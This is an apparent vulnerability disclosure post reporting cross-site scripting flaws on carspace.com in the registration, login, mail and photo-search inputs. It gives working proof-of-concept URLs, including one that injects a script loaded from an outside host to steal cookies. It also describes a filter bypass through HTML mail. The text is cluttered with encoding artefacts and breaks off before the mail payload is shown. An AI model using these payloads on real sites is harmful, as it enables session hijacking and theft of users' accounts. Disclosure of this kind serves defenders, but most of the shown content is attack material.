Carspace.com - XSS with cookie disclosure
Carspace.com - XSS with cookie disclosure
Carspace.com=0D
=0D
Homepage:=0D
http://www.carspace.com=0D
=0D
Affected files:=0D
Input boxes of registering=0D
Login boxes=0D
sending mail input boxes.=0D
Searching for photos.=0D
=0D
XSS vuln with cookie disclosure via ErrorMessage when registering:=0D
http://www.carspace.com/?register@@!ErrorMessage=
.
=0D">SRC=http://youfucktard.com/x2.js>.
=0D
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/carspace1.jpg=0D
=0D
Same XSS vuln with cookie disclosure as above, this time in login box. For PoC put:=0D
=0D
">">">">'>'>'><"">">"><"<"<"<"<'<'<"=0D">http://www.carspace.com/?login@@!EmailAddress=">">">">">'>'>'><"">">"><"<"<"<"<'<'<"=0D
=0D
&ErrorMessage=No%20account%20with%20this%20e-mail%20address.%20Please%20%20sign%20up%20to%20get%20the%20email%20activation%20link.%0A=0D
=0D
Screenshot:=0D
http://www.youfucktard.com/xsp/carspace2.jpg=0D
=0D
Sending mail XSS vuln with cookie disclosure:=0D
=0D
When sending mail you can enable the option to make a "HTML" email. This should be a no no right off the bat. To bypass their filters still however, we will use a table tag with long UTF-8 uncicode ' so they don't get filtered. For a PoC put the codes below in the body of your mail msg. Make sure "HTML Mail" is checked =0D
=0D
in:=0D
=0D
=0D
=0D
And to get the cookie:=0D